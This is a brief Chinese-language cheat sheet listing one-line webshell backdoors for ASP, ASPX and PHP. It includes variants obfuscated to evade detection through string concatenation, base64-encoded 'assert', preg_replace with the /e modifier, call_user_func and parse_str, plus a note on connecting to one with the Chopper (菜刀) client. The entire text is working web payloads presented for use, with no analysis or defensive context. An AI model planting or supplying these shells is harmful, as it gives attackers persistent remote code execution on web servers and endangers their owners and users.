- asp一句话木马是<%execute(request("value"))%>
- aspx的一句话木马是<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
- php一句话木马是<?php @eval($_POST['pass'])?>
-
一些特殊构造的php一句话木马
<script language="pHp"></script>用这个来包含一句话木马
- \$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
\$hh("/[discuz]/e",$_POST['h'],"Access");
- <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
- <?php assert(@$_POST['a']); ?>
call_user_func函数:
<?php@call_user_func(assert,$_POST[a]);?>
file_put_contents函数:
<?php $test=<?php $a=$_POST["cmd"];assert($a); ?>;file_put_contents("Trojan.php", $test);?>
base64编码: <?php $a=base64_decode("YXNzZXJ0");$a($_POST[a]);?>
.连接符:<?php $a="ass"."e";$b="r"."t";$c=$a.$b;$c($_POST[a]); ?>
parse_str函数:<?php $str=”a=assert”;parse_str($str);$a($_POST[a]);?>
<?php ($_=@$_GET[2]).@$_($_POST[1])?>在菜刀中传入GET参数 2=assert 密码为1
